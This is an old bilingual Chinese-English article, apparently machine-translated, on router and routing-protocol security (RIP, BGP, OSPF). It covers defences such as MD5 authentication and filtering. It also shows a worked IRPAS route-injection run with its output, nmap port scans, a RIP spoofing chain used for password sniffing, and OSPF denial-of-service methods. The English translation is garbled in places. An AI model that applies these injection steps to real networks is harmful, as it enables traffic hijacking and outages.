路由器在每个网络中起到关键的作用,如果一路由器被破坏或者一路由被成功的欺骗,网络的完整性将受到严重的破坏,如果使用路由的主机没有使用加密通信那就更为严重,因为这样的主机被控制的话,将存在着中间人(man-in-the-middle)攻击,拒绝服务攻击, 数据丢失,网络整体性破坏,和信息被嗅探等攻击。 Each router in the network play a key role, if a router is damaged or has been successfully deceived by the way, the network integrity will be severely damaged, if the host does not use routes using encrypted communications would be more serious, because the host is controlled, then there will be an intermediary (man-in-the-middle) attacks, denial of service attacks, data loss, network integrity destruction, and information is sniffing attacks.
路由是一个巨大又复杂的话题,所以本人只是在此提到一部分知识,而且水平的关系,请大家多多指教。 Routing is a huge and complex topic, so I just mentioned in this part of knowledge, and level of relationship, please exhibitions.
=============================================================================== ================================================== =============================
关于一些很普遍的路由器安全问题 On some very common router security problems
多种路由器存在各种众所周知的安全问题,一些网络底层设备提供商如Cisco, Livingston, There are various well-known variety of router security issues, some of the underlying network equipment providers such as Cisco, Livingston,
Bay等的普通安全问题大家可以参考下面地址,其中收集了不少安全漏洞: Bay and other common security problems we can refer to the following address, which collect a lot of security vulnerabilities:
http://www.antionline.com/cgi-bin/anticode/anticode.pl?dir=router-exploits http://www.antionline.com/cgi-bin/anticode/anticode.pl?dir=router-exploits
上面地址所收集的漏洞大部分无关于路由协议级的攻击,而是一些由于错误配置,IP信息包错误处理,SNMP存在默认的communit name string,薄弱密码或者加密算法不够强壮而造成。 The above address vulnerabilities collected without the majority of attacks on the routing protocol level, but some due to an error configuration, IP packet error handling, SNMP there is no default communit name string, or a weak password encryption algorithm is not strong enough and cause. 上面的一些攻击一般一个标准的NIDS都能够探测出来。 Some of the above attacks are usually a standard NIDS can detect it. 这些类型的攻击对网络底层有一定的削弱性并可以组合一些高极别的协议进行攻击。 These types of attacks on the network has some underlying debilitating and can mix some of the very high level protocol attacks.
正确的配置管理可以处理不少普通的漏洞,如你必须处理一些标准的规程:不使用SNMP(或者选择强壮的密码),保持补丁程序是最新的,正确处理访问控制列表,出入过滤,防火墙,加密管理通道和密码,路由过滤和使用MD5认证。 Correct configuration management can handle a lot of common vulnerabilities, such as you have to deal with some of the standard procedures: do not use SNMP (or choose a strong password), to maintain patches are current, correct handling of access control lists, access filtering, firewall, channel encryption and password management, routing, filtering and MD5 authentication. 当然在采用这些规程之前你必须知道这些安全规则的相关的含义和所影响到的服务。 Of course, in using these procedures before you have to know the safety rules related to the meaning and the impact on services.
================================================================================ ================================================== ==============================
近来有关的一些低部构造防卫检测系统的开发 Recently, the Ministry of Construction on some of the low detection defense system development
近来的在网络防护开发项目中比较不错的是一个IDS叫JiNao,你可以在下面的地址找到相关的内容: http://www.anr.mcnc.org/projects/JiNao/JiNao.html. JiNao是由DARPA发起的,并现在成为一个合作研究项目由MCNC和北卡罗莱纳州大学共同开发。 Recent development projects in the network protection is a relatively good IDS called JiNao, you can find the address below content: http://www.anr.mcnc.org/projects/JiNao/JiNao.html. JiNao is sponsored by DARPA and is now a collaborative research project by MCNC and North Carolina State University to develop. JiNao在FreeBSD和Linux上运行的是在线模式(使用divert sockets),在Solaris运行在离线模式,并在3个网络上测试-MCNC,NCSU和由PC(操作系统做路由)和商业路由器组合的AF/Rome 实验室。 JiNao on FreeBSD and Linux is running on the online mode (using divert sockets), in Solaris running in offline mode, and test the network in three-MCNC, NCSU, and from the PC (operating system to do the routing) and a combination of commercial routers AF / Rome Laboratory. 测试结果显示了可以成功的防止多种类型的网络底层攻击并能很好的高精度的探测这些攻击。 Test results show that can successfully prevent many types of network attacks and can be a good low-level high-precision detection of these attacks.
当前,JiNao看起来在研究关于Open Shortest Path First (OSPF,开放最短路径优先)协议,并且最终JiNao会延伸到各种协议。 At present, JiNao look at research on the Open Shortest Path First (OSPF, Open Shortest Path First) protocol, and finally JiNao will extend to a variety of protocols. JiNao指出,防卫攻击和入侵探测将会集成在网络管理内容中,所以JINao现在正趋向于网络防火墙,入侵探测系统和网络管理系统组合一体。 JiNao that the defense attacks and intrusion detection will be integrated into the network management content, so JINao now tend to network firewalls, intrusion detection systems and network management systems combined into one.
还有一个工具可以很好的分析高级的协议,如Agilent Advisor There is also a good tool to analyze high-level protocols, such as the Agilent Advisor
( http://onenetworks.comms.agilent.com/)的网络分析工具,它能很好的支持多种路由协议并能定制过滤器来探测各种不正常的行为。 (Http://onenetworks.comms.agilent.com/) network analysis tools, it is a good support multiple routing protocols and can customize a variety of filters to detect abnormal behavior.
================================================================================ ================================================== ==============================
一些工作于路由协议的工具 Some tools work in routing protocols
------------------------------- -------------------------------
Linux divert sockets描述到:"Divert socket能够在末端主机也能在路由器上进行IP信息包捕获和注入,信息包的捕获和插入发生在IP层上,捕获的信息包在用户空间转向到套接口中,因此这些信息包将不会达到它们的最终目的地,除非用户空间套接口重插入它们。这样在信息包捕获和重新插入之间可以在系统系统内核之外允许各种不同的操作(如路由和防火墙)."( http://www.anr.mcnc.org/~divert/).简单的说divert socket就是由user space(用户空间)的程序来处理kernel(内核)中的IP packet(IP信息包),这个divert socket最早应用与FreeBSD系统中,如NAT就是应用了divert socket。 Linux divert sockets description to: "Divert socket can also be the host at the end on the router and into the IP packet capture, packet capture and insertion occurs at the IP layer, the captured packets in user space to socket in turn , so these packets will not reach their final destination, unless the user space sockets re-insert them, so that in the information packet capture and re-inserted between the outside of the kernel in the system allows various operations (such as routing and firewalls). "(http://www.anr.mcnc.org/ ~ divert /). simply divert socket is the user space (user space) to handle kernel (kernel) in the IP packet (IP packet), the first application and FreeBSD divert socket systems, such as NAT is the application of a divert socket. 这样使开发程序很容易,因为在用户层,而处理IP packet(IP信息包)的效率也比较高,因为是直接处理kernel(内核)中的IP packet(IP信息包)。 This allows developers to program easily, because the user level, and dealing with IP packet (IP packet) the efficiency is relatively high, because it is directly with kernel (kernel) of the IP packet (IP packet).
大家可以在下面的地址中找到相关的Divert socket: http://www.anr.mcnc.org/~divert/. Divert socket就象上面说最早实现于FreeBSD中,现在已经移植到Linux中并作为JiNao IDS项目的一部分采用。 We can be found at the following address associated Divert socket: http://www.anr.mcnc.org/ ~ divert /. Divert socket as said above, first implemented in FreeBSD, has now been ported to Linux, and as JiNao IDS uses part of the project.
------------------------------ ------------------------------
另一个叫Nemesis Packet Injection suite,是一个比较强大的网络和安全工具,由Obecian开发,你可以在下面的地址获得: http://www.packetninja.net.最新的nemesis-1.1发行在2000年6月24号。 Another called the Nemesis Packet Injection suite, is a more powerful network and security tools, developed by the Obecian, you can obtain the following address: http://www.packetninja.net. The latest nemesis-1.1 release in June 2000 on November 24. Nemesis是一个"命令行式的UNIX网络信息包插入套件",并是一个很好的测试防火墙,入侵探测系统,路由器和其他网络环境的工具。 Nemesis is a "command-line UNIX network packet into the suite," and is a good test firewall, intrusion detection systems, routers and other network environment tools. 它可以被攻击者使用和授权渗透探测者在主机和网络级的网络安全环境检测。 It can be used and authorize the attacker to detect penetration of the host and network level in the network security environment testing. 其中这个站点还有一个演化的Nemesis叫Intravenous,发行于11/30/00.Intravenous看起来承载了Nemesis所有基本功能,其中不同的是增加了人工智能引擎的内容。 Which the evolution of the site there is a Nemesis called Intravenous, issued in 11/30/00.Intravenous look Nemesis carries all the basic functions, which is the addition of different artificial intelligence engine content. 更多有关Intravenous的信息你可以在packetninja.net站点里找到. More information about Intravenous can packetninja.net site you find.
---------------------------- ----------------------------
IRPAS,Internetwork Routing Protocol Attack Suite,由FX所写,可以在下面的站点找到 IRPAS, Internetwork Routing Protocol Attack Suite, written by the FX can be found at the following site
http://www.phenoelit.de/irpas/.IRPAS包含了各种可工作于Cisco路由设备的协议层的命令行工具, http://www.phenoelit.de/irpas/.IRPAS contains a variety of Cisco routing equipment can work in the protocol layer of command-line tool,
包括如下这些命令: These commands include the following:
cdp--可发送Cisco router Discovery Protocol (CDP CISCO路由发现协议)消息; cdp - can send Cisco router Discovery Protocol (CDP CISCO Router Discovery Protocol) messages;
igrp是能插入Interior Gateway Routing Protocol (IGRP 内部网关路由协议)消息;irdp用来发送ICMP Router Discovery Protocol (ICMP路由发现协议)消息; igrp is able to insert the Interior Gateway Routing Protocol (IGRP Interior Gateway Routing Protocol) messages; irdp used to send ICMP Router Discovery Protocol (ICMP Router Discovery Protocol) message;
irdresponder--可使用精心制作的信息包来响应IRDP请求; irdresponder - using elaborate IRDP packets in response to the request;
ass--Autonomous System Scanner(自主系统扫描器,现在可下载的版本只支持IGRP),这里解释下Autonomous system,即一般所说的AS,简单的说是一组内部路由器,使用共同协议交流内部网络的信息,更直接的说法就是这些路由器自己自主,交流信息。 ass - Autonomous System Scanner (autonomous system scanner, is now available for download version only supports IGRP), here to explain the next Autonomous system, that is referred to AS, simply is a set of internal routers, the internal communication network using a common protocol information, a more direct argument is that these routers own self, to exchange information. 与之相反的是我们经常知道的外部路由器如一般的电信节点处的路由器。 In contrast we often know the external router, such as general telecommunications node router. 典型的AS使用单一的路由协议在它的边界产生和传播路由信息。 AS typically use a single routing protocol in its routing information generation and dissemination of the border. ass就类似于TCP端口扫描器一样,只不过其是针对自主系统的。 ass is similar to TCP port scanner, but it is for independent system. 使用ass扫描的话,如果自主系统应答,将返回路由进程中的所有路由信息。 Scan with ass and if autonomous system response, will return all routes in the routing process information. IRPAS 的网站也包含一条关于Generic Routing Encapsulation(GRE 一般路由封装) 漏洞的文档,其中这个Generic Routing Encapsulation (GRE 一般路由封装) 漏洞允许外部攻击者绕过NAT和破坏一通过VPN的内部RFC1918网络。 IRPAS site also contains an article on the Generic Routing Encapsulation (GRE Generic Routing Encapsulation) vulnerability of the document, including the Generic Routing Encapsulation (GRE Generic Routing Encapsulation) vulnerabilities allow attackers to bypass NAT and external damage to an internal RFC1918 network through a VPN. 这份文档大家可以在下面的地址获得: http://www.phenoelit.de/irpas/gre.html,其中在其他章节还包含了更多的信息和通过irpas的可能攻击策略. In this document we can obtain the following address: http://www.phenoelit.de/irpas/gre.html, which in other chapters also contain more information and possible attacks by irpas strategy.
irpas的开发者FX,发送了由ass新版本2.14(还没有发布)扫描的AS样本和igrp怎样利用ass的信息(AS #10和其他数据)来插入一欺骗的路由给222.222.222.0/24。 irpas developers FX, sent by the ass new version 2.14 (not released) scan of the AS samples and igrp ass how to use the information (AS # 10 and other data) to insert a cheat route to 222.222.222.0/24. 虽然IGRP协议目前不是很多使用,但这个例子却是相当的不错。 Although the IGRP protocol is not much use now, but this case is quite good. 下面是FX测试的结果: Here are FX test results:
test# ./ass -mA -i eth0 -D 192.168.1.10 -b15 -v test #. / ass-mA-i eth0-D 192.168.1.10-b15-v
(这里的-i是接口,-D是目的地址,-b15指的是自主系统0-15之间 (Where-i is the interface,-D is the destination address,-b15 refers autonomous system between 0-15
ASS [Autonomous System Scanner] $Revision: 2.14 $ ASS [Autonomous System Scanner] $ Revision: 2.14 $
(c) 2k FX < fx@phenoelit.de> (C) 2k FX
Phenoelit ( http://www.phenoelit.de) Phenoelit (http://www.phenoelit.de)
No protocols selected; scanning all No protocols selected; scanning all
Running scan with: Running scan with:
interface eth0 interface eth0
Autonomous systems 0 to 15 Autonomous systems 0 to 15
delay is 1 delay is 1
in ACTIVE mode in ACTIVE mode
Building target list ... Building target list ...
192.168.1.10 is alive 192.168.1.10 is alive
Scanning ... Scanning ...
Scanning IGRP on 192.168.1.10 Scanning IGRP on 192.168.1.10
Scanning IRDP on 192.168.1.10 Scanning IRDP on 192.168.1.10
Scanning RIPv1 on 192.168.1.10 Scanning RIPv1 on 192.168.1.10
shutdown ... shutdown ...
OK,得到以下的结果 OK, get the following results
>>>>>>>>>>>> Results >>>>>>>>>>> >>>>>>>>>>>> Results >>>>>>>>>>>
192.168.1.10 192.168.1.10
IGRP IGRP
#AS 00010 10.0.0.0 (50000,1111111,1476,255,1,0) # AS 00010 10.0.0.0 (50000,1111111,1476,255,1,0)
IRDP IRDP
192.168.1.10 (1800,0) 192.168.1.10 (1800,0)
192.168.9.99 (1800,0) 192.168.9.99 (1800,0)
RIPv1 RIPv1
10.0.0.0 (1) 10.0.0.0 (1)
test# ./igrp -i eth0 -f routes.txt -a 10 -S 192.168.1.254 -D 192.168.1.10 test #. / igrp-i eth0-f routes.txt-a 10-S 192.168.1.254-D 192.168.1.10
当然这里的routes.txt需要你自己指定: Of course, here routes.txt need to specify your own:
routes.txt: routes.txt:
# Format # Format
# destination:delay:bandwith:mtu:reliability:load:hopcount # Destination: delay: bandwith: mtu: reliability: load: hopcount
222.222.222.0:500:1:1500:255:1:0 222.222.222.0:500:1:1500:255:1:0
Cisco#sh ip route Cisco # sh ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
U - per-user static route U - per-user static route
Gateway of last resort is not set Gateway of last resort is not set
10.0.0.0/8 is variably subnetted, 2 subnets, 2 masks 10.0.0.0 / 8 is variably subnetted, 2 subnets, 2 masks
C 10.1.2.0/30 is directly connected, Tunnel0 C 10.1.2.0/30 is directly connected, Tunnel0
S 10.0.0.0/8 is directly connected, Tunnel0 S 10.0.0.0 / 8 is directly connected, Tunnel0
C 192.168.9.0/24 is directly connected, Ethernet0 C 192.168.9.0/24 is directly connected, Ethernet0
C 192.168.1.0/24 is directly connected, Ethernet0 C 192.168.1.0/24 is directly connected, Ethernet0
I 222.222.222.0/24 [100/1600] via 192.168.1.254, 00:00:05, Ethernet0 I 222.222.222.0/24 [100/1600] via 192.168.1.254, 00:00:05, Ethernet0
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
看到没有,到达222.222.222.0/24经由192.168.1.254 See not, reach 222.222.222.0/24 through 192.168.1.254
----------------------------- -----------------------------
Rprobe & srip--这个工具附带在一篇关于RIP欺骗非常不错的指南文档中(由humble写),你可以在下面的地址找到这篇文章 http://www.technotronic.com/horizon/ripar.txt.Rprobe工具会从一路由daemon(守护程序)中请求一RIP路由表的拷贝,使用Tcpdump或者其他任何嗅探工具可以用来捕获这些结果。 Rprobe & srip - This tool comes in a fraud on a very good guide RIP document (written by the humble), you can find the address below article http://www.technotronic.com/horizon/ripar. txt.Rprobe tools from all the way from the daemon (daemon) to request a copy of the RIP routing table, using Tcpdump or any other sniffer tools can be used to capture these results. 接下来,srip可以用来从任意源IP发送一伪造的RIPv1或者RIPv2消息,Srip可以插入新的路由和使当前的路由无效,当然攻击者/渗透测试者需要知道命令行中使用什么参数。 Next, srip from any source can be used to send a forged IP RIPv1 or RIPv2 messages, Srip can insert a new route and the current route is invalid, of course, the attacker / penetration tester needs to know what parameters to use the command line. 关于这些工具的介绍可参看Hacking Exposed 第二版Network Device节找到示例。 The introduction of these tools can be found in the second edition of Hacking Exposed Network Device section to find examples.
------------------------ ------------------------
当然还有其他工作与相关路由协议的工具可被攻击者或者渗透测试者使用,如:Routed, Of course there are other routing protocols work and related tools can be an attacker or penetration testers, such as: Routed,
gated, zebra, mrt, 和gasp ,大家可以参看其他的文档。 gated, zebra, mrt, and gasp, we can refer to other documents.
================================================================================= ================================================== ===============================
下面是有关各种协议的浅释和相关漏洞及可以采用的防卫措施 Here is the Simple Explanation of the various agreements and related vulnerabilities and defensive measures that can be used
Routing Information Protocol (RIP,路由信息协议) Routing Information Protocol (RIP, Routing Information Protocol)
Routing Information Protocol (RIP,路由信息协议)是基于距离矢量的路由协议,其所有路由基于(hop)跳数来衡量。 Routing Information Protocol (RIP, Routing Information Protocol) is based on the distance vector routing protocol, based on all its routes (hop) to measure the number of hops. 由Autonomous System (AS,自主系统) 来全面的管理整个由主机,路由器和其他网络设备组成的系统。 By the Autonomous System (AS, autonomous systems) to fully manage the whole by the hosts, routers and other network devices systems. RIP是作为一种内部网关协议(interior gatewayprotocol),即在自治系统内部执行路由功能。 RIP is as an interior gateway protocol (interior gatewayprotocol), that is autonomous within the system perform routing functions. 相反的大家都知道外部网关路由协议(exterior gateway protocol),如边缘网关协议(BGP),在不同的自治系统间进行路由。 Instead we all know Exterior Gateway Routing Protocol (exterior gateway protocol), such as the Border Gateway Protocol (BGP), between different autonomous system routing. RIP协议对大型网络来说不是一个好的选择,因为它只支持15跳,RIPv1而且只能通信自身相关的路由信息,反之RIPv2能对其他路由器进行通信。 RIP protocol for large networks is not a good choice because it supports only 15 jumps, RIPv1 and can only communicate its routing information related, whereas RIPv2 can communicate with other routers. RIP 协议能和其他路由协议共同工作,依照Cisco,RIP协议经常用来与OSPF协议相关联,虽然很多文荡指出OSPF需代替RIP.应该知道经由RIP更新提交的路由可以通过其他路由协议重新分配,这样如果一攻击者能通过RIP来欺骗路由到网络,然后再通过其他协议如OSPF或者不用验证的BGP协议来重新分配路由,这样攻击的范围将可能扩大。 RIP routing protocol and other protocols can work together, according to Cisco, RIP protocol is often used with the OSPF protocol is associated, although a lot of text to be replaced by swing that OSPF RIP. Should know by the RIP routing updates submitted by other routing protocols can be redistributed So, if an attacker to trick RIP routing through the network, and then through other protocols such as OSPF or BGP without verification protocol to redistribute routes, the scope of this attack will be expanded.
RIP协议相关的漏洞和防范措施 RIP protocol related vulnerabilities and preventive measures
一个测试者或者攻击者可以通过探测520 UDP端口来判断是否使用RIP,你可以使用熟悉的工具如nmap来进行测试,如下所示,这个端口打开了并没有使用任何访问控制联合任意类型的过滤: A test person or the attacker can detect 520 UDP port to determine whether to use RIP, you can use familiar tools such as nmap to test, as shown below, this port open, and not using any access control joint any type of filtering:
[ root@test]# nmap -sU -p 520 -v router.ip.address.2 [Root @ test] # nmap-sU-p 520-v router.ip.address.2
interesting ports on (router.ip.address..2): interesting ports on (router.ip.address .. 2):
Port State Service Port State Service
520/udp open route 520/udp open route
扫描UDP520端口在网站http://www.dshield.org/的"Top 10 Target Ports"上被排列在第7位,你表明有许多人在扫描RIP,这当然和一些路由工具工具的不断增加有一定的关联。 Scanning UDP520 port site http://www.dshield.org/ the "Top 10 Target Ports" been arranged in the first seven, you indicate there are many people in the scan RIP, of course, and some routing increasing with Tools some relevance.
RIPv1 天生就有不安全因素,因为它没有使用认证机制并使用不可靠的UDP协议进行传输。 RIPv1 are born of insecurity, because it does not use authentication mechanism using the unreliable UDP protocol transfer. RIPv2的分组格式中包含了一个选项可以设置16个字符的明文密码字符串(表示可很容的被嗅探到)或者MD5签字。 RIPv2 packet format contains an option to set the 16 characters of the password string (that can be very content to be sniffed) or MD5 signature. 虽然RIP信息包可以很容易的伪造,但在RIPv2中你使用了MD5签字将会使欺骗的操作难度大大提高。 Although the RIP packets can be easily forged, but in the RIPv2 MD5 signature you use will make the operation more difficult to deceive greatly increased. 一个类似可以操作的工具就是nemesis项目中的RIP命令--nemesis-rip,但由于这个工具有很多的命令行选项和需要必备的知识,所以nemesis-rip 比较难被script kiddies使用。 A similar tool is the nemesis can operate the project in the RIP commands - nemesis-rip, but this tool has a lot of command line options and the need for essential knowledge, so the nemesis-rip more difficult to be script kiddies use. 想使用nemesis-rip成功进行一次有效的RIP欺骗或者类似的工具需要很多和一定程度的相关知识。 Want to use nemesis-rip a successful and effective RIP spoof or similar tools require a lot of knowledge and a certain degree. 不过"Hacking Exposed"第二版第10章:Network Devices提到的有些工具组合可以比较容易的进行RIP欺骗攻击攻击,这些工具是使用rprobe来获得远程网络RIP路由表,使用标准的 tcpdump或者其他嗅探工具来查看路由表,srip来伪造RIP信息包(v1或者v2),再用fragrouter重定向路由来通过我们控制的主机,并使用类似dsniff的工具来最后收集一些通信中的明文密码。 However, "Hacking Exposed" Second Edition Chapter 10: Network Devices mentioned some tools can be relatively easy to mix RIP spoofing attacks is to use these tools to get the remote network rprobe RIP routing table, use the standard tcpdump or other olfactory exploration tool to view the routing table, srip to forge a RIP packet (v1 or v2), and then redirect fragrouter route to the host through our control, and use tools like dsniff to collect some of the last communication of the password.
尽管大家知道欺骗比较容易,但仍然存在一些大的网络提供商仍旧依靠RIP来实现一些路由功能,虽然不知道他们是否采用来安全的措施。 Although we know that fraud is easier, but there are still some major network providers still rely on to achieve some of the RIP routing functionality, although they do not know whether to use security measures. RIP显然目前还是在使用,呵呵但希望很少人使用RIPv1,并且使用了采用MD5安全机制的RIPv2,或者已经移植到了使用MD5认证的OSPF来提高安全性。 RIP apparently is still in use, Oh but few people want to use RIPv1, and use a security mechanism uses MD5 RIPv2, or has been ported to use the OSPF MD5 authentication to improve security.
Border Gateway Protocol (BGP,边界网关协议) Border Gateway Protocol (BGP, Border Gateway Protocol)
BGP 是Exterior Gateway Protocol (EGP,外部网关协议),此协议执行的时候自主系统之间的路由,现在BGP4是最近的流行标准,BGP使用几种消息类型,其中这文章相关的最重要的消息是UPDATE消息类型,这个消息包含了路由表的更新信息,全球INTERNET大部分依靠BGP,因此一些安全问题必须很严肃的对待,L0pht几年就宣称过:他们能在很短的时间内利用路由协议的安全如BGP来搞垮整个Internet. BGP is an Exterior Gateway Protocol (EGP, Exterior Gateway Protocol), the implementation of this protocol when routing between autonomous systems, now is the latest popular standard BGP4, BGP uses several message types, of which this article the most important news related to are the UPDATE message type, the message contains a routing table updates, INTERNET largely dependent on the global BGP, so some very serious security problem must be treated, L0pht had declared a few years: they can in a very short period of time using the routing protocol security, such as BGP to bring down the entire Internet.
BGP协议相关的漏洞和防范措施 BGP protocol-related vulnerabilities and preventive measures
BGP使用TCP 179端口来进行通信,因此nmap必须探测TCP 179端口来判断BGP的存在。 BGP uses TCP 179 port to communicate, so nmap TCP 179 port must be detected to determine the presence of BGP.
[ root@test]# nmap -sS -p 179 -v router.ip.address.2 [Root @ test] # nmap-sS-p 179-v router.ip.address.2
Interesting ports on (router.ip.address..2): Interesting ports on (router.ip.address .. 2):
Port State Service Port State Service
179/tcp open bgp 179/tcp open bgp
-一个开放的BGP端口,更容易被攻击 - An open BGP port, more likely to be attacked
[ root@test]# nmap -sS -n -p 179 router.ip.address.6 [Root @ test] # nmap-sS-n-p 179 router.ip.address.6
Interesting ports on (router.ip.address.6): Interesting ports on (router.ip.address.6):
Port State Service Port State Service
179/tcp filtered bgp 179/tcp filtered bgp
BGP端口被过滤了,对攻击有一定的抵抗力。 BGP port is filtered, there is a certain resistance to the attack.
由于BGP使用了TCP的传输方式,它就会使BGP引起不少关于TCP方面的问题,如很普遍的SYN Flood攻击,序列号预测,一般拒绝服务攻击等。 BGP uses TCP as the transport mode, it will cause a lot about the BGP TCP issues, such as SYN Flood attack is very common, sequence number prediction, the general denial of service attacks. BGP没有使用它们自身的序列而依靠TCP的序列号来代替,因此,如果设备采用了可预测序列号方案的话,就存在这种类型的攻击,幸好的是,运行在Internet上大部分重要的路由器使用了Cisco设备,而其是没有使用可预测序列号方案。 BGP does not use their own sequences and rely on the TCP sequence number to replace, so if the device using the serial number programs that can predict, then there is this type of attack, but fortunately is most important to run the router on the Internet the use of Cisco equipment, but it is not predictable serial number using the program.
部分BGP的实现默认情况下没有使用任何的认证机制,而有些可能存在和RIP同样的问题就是使用了明文密码。 Part of the default BGP implementations do not use any authentication mechanism, and some may have the same problem and the RIP is to use a plaintext password. 这样假如认证方案不够强壮的话,攻击者发送UPDATE信息来修改路由表的远程攻击的机会就会增加许多,导致进一步的破坏扩大。 If this authentication scheme is not strong enough, then, the attacker sends the information to modify the routing table UPDATE remote attacks will increase the chance of many, leading to further damage expanded.
BGP也可以传播伪造的路由信息,如果攻击者能够从一协议如RIP中修改或者插入路由信息并由BGP重新分配。 BGP routing can also be spread false information, if an attacker from a protocol such as RIP can modify or insert routing information by BGP redistribution. 这个缺陷是存在与信任模块中而不是其协议本身。 This defect is present and trust module rather than the protocol itself. 另外BGP的community 配置也会有某些类型的攻击,原因是community name在某些情况下是作为信任token(标志)可以被获得。 Another BGP's community configuration will have some type of attack, because in some cases community name as a trusted token (sign) can be obtained. 至于通过通过BGP的下层协议(TCP)对其攻击看来是比较困难的,因为会话在点对点之间是通过一条单独的物理线路进行通信的,但在一定环境如在两AS系统通过交换机来连接则可能存在TCP插入的攻击,在这样的网络中,攻击者在同一VLAN或者他有能力嗅探switch的通信(如使用dsniff工具通过 ARP欺骗来获得),监视TCP序列号,插入修改的信息包或者使用工具如hunt的进行hijack连接而获得成功,但这种类型的攻击一般只能在实验室环境中演示比较容易,而在实际的网络中因为太过复杂而很难成功。 As passed by the lower BGP protocol (TCP) for its attack appears to be more difficult, because the session is between the point to point through a single physical circuit to communicate, but in certain environments such as in the AS system via two switches TCP connection is possible to insert the attack, in such a network, the attacker in the same VLAN or switch his ability to sniff the communication (such as dsniff tools to get through the ARP spoofing), monitor TCP sequence numbers, inserting the modified information package or to use tools such as hunt for hijack the connection and be successful, but generally this type of attack can only be demonstrated in a laboratory environment more easily, and in the actual network as too complex and difficult to achieve.
要使BGP更安全,你最好对端口179采用访问列表控制,使用MD5认证,使用安全传输媒体进行安全BGP通信和执行路由过滤(你可以查看下面的文档(see http://www.cisco.com/univercd/cc/ To make BGP more secure, you'd better use of port 179 access list control, use MD5 authentication, secure transmission media using secure communications and the implementation of BGP route filtering (you can view the following document (see http://www.cisco. com / univercd / cc /
td/doc/product/software/ios120/12cgcr/np1_c/1cprt1/1cbgp.htm#40309)以及一些标准的路由安全设置过滤配置。 td/doc/product/software/ios120/12cgcr/np1_c/1cprt1/1cbgp.htm # 40309) as well as some standard security settings for filtering routing configuration.
------------------------ ------------------------
Open Shortest Path First (OSPF,开放最短路径优先协议) Open Shortest Path First (OSPF, Open Shortest Path First)
OSPF 是动态连接状态路由协议,其保持整个网络的一个动态的路由表并使用这个表来判断网络间的最短路径,OSPF是内部使用连接状态路由协议,协议通过向同层结点发送连接状态信息(LSA)工作,当路由器接收到这些信息时,它就可以根据SPF算法计算出到每个结点的最短路了。 OSPF is a dynamic link-state routing protocol, and its entire network to maintain a dynamic routing table and use this table to determine the shortest path between networks, OSPF is an internal use of link-state routing protocol, the protocol layer through the same node sends link state information (LSA) to work when the router receives this information, it can be calculated based on the SPF algorithm to each node of the most short-circuited. 其他相临路由器通过使用OSPF的Hello协议每10秒发送一个问候包给224.0.0.5,然后接收这些路由器发回的信息。 Other adjacent routers using OSPF's Hello Protocol every 10 seconds to send a greeting packet to 224.0.0.5, and then receives the information sent back to the router. 一个OSPF的hello信息包头可以通过iptraf来嗅探到,如下所示: A header information of OSPF hello by iptraf to sniff, as follows:
OSPF hlo (a=3479025376 r=192.168.19.35) (64 bytes) from 192.168.253.67 to 224.0.0.5 on eth0 OSPF hlo (a = 3479025376 r = 192.168.19.35) (64 bytes) from 192.168.253.67 to 224.0.0.5 on eth0
192.168.253.67边界路由器发送一个helo信息包给多播(224.0.0.5)来告诉其他路由器和主机怎样从192.168.19.35联系区域a(a=3479025376). 192.168.253.67 helo border router sends a message packet to multicast (224.0.0.5) to tell how the other routers and hosts from 192.168.19.35 contact area a (a = 3479025376).
一旦路由器接受到Hello信息包,它就开始同步自己的数据库和其他路由一样。 Once the router receives Hello packets, it begins to synchronize their databases and other routing the same.
一个LAS头包括以下几个部分: LS age, option, LS type, Link state ID, Advertising Router ID, A LAS header contains the following sections: LS age, option, LS type, Link state ID, Advertising Router ID,
LS sequence number, LS checksum, 和length. LS sequence number, LS checksum, and length.
OSPF协议相关的漏洞和防范措施 OSPF protocol related vulnerabilities and preventive measures
OSPF使用协议类型89,因此你可以使用nmap协议扫描来判断OSPF,除非网络通过配置访问列表来不响应这些类型的查询。 OSPF uses protocol type 89, so you can use nmap protocol scan to determine the OSPF, unless the network by configuring access lists to not respond to these types of queries. 如下所示: As follows:
root@test]# nmap -sO -router.ip.address.252 root @ test] # nmap-sO-router.ip.address.252
Interesting protocols on (router.ip.address.252): Interesting protocols on (router.ip.address.252):
Protocol State Name Protocol State Name
89 open ospfigp 89 open ospfigp
OSPF由于内建几个安全机制所以比起RIP协议安全的多,但是,其中LSA的几个组成部分也可以通过捕获和重新注入OSPF信息包被修改,JiNao小组开发了一个FREEBSD divert socket的LINUX实现并在它们的测试中使用到。 OSPF security mechanisms so as built several security more than the RIP protocol, however, several components of the LSA which can also capture and re-injected into the OSPF packet is modified, JiNao group developed a FREEBSD divert socket implementation of LINUX and use them to test.
OSPF 可以被配置成没有认证机制,或者使用明文密码认证,或者MD5,这样如果攻击者能获得一定程度的访问,如他们可以使用如dsniff等工具来监视OSPF 信息包和或者明文密码,这个攻击者可以运行divert socket或者其他可能的各种类型ARP欺骗工具来重定向通信。 OSPF can be configured without authentication mechanism, or use the plain text password authentication, or MD5, so if an attacker can get access to a certain extent, as they can use tools such as dsniff to monitor, or OSPF packets and clear text passwords, the attacker can run divert socket or other possible types of ARP spoofing tools to redirect traffic.
JiNao小组发现了有关OSPF的4种拒绝服务的攻击方法,下面是简单的说明: JiNao team found the four on OSPF denial of service attack, the following is a brief explanation:
--Max Age attack攻击LSA的最大age为一小时(3600) - Max Age attack greatest attack LSA age is one hour (3600)
攻击者发送带有最大MaxAge设置的LSA信息包,这样,最开始的路由器通过产生刷新信息来发送这个LSA,而后就引起在age项中的突然改变值的竞争。 Attacker sends setup with the largest MaxAge LSA packets, so that by the beginning of the router to send this information to generate refresh LSA, and caused after the item in the age of the sudden change in the value of competition. 如果攻击者持续的突然插入最大值到信息包给整个路由器群将会导致网络混乱和导致拒绝服务攻击。 If the attacker suddenly going to insert the maximum information packet to the router base will lead to confusion and denial of service network attacks.
